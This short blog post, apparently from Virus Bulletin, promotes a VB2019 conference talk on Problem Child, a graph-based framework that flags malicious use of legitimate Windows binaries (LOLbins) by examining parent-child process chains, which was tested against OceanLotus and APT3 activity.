Living-off-the-land binaries, often referred to as LOLbins, are legitimate (
Windows
) binaries used for malicious purposes. Their use has increased in malware campaigns in recent years and serves as a reminder that a defensive approach focused purely on detecting malicious binaries is outdated.
Thus rather than focus on the binaries itself, it is important to study the parent-child process that leads to a binary being executed to determine whether its use is likely malicious.
This is the premise of
a paper
to be presented at VB2019 by
Endgame
researcher Bobby Filar, who will discuss Problem Child, a graph-based framework designed to address these issues. In his research he also used the framework against activities by two known APT actors: OceanLotus and APT3.
With VB2019 just one month away, it is time to
book your ticket
for the most international threat intelligence event of the year!
Leave a Reply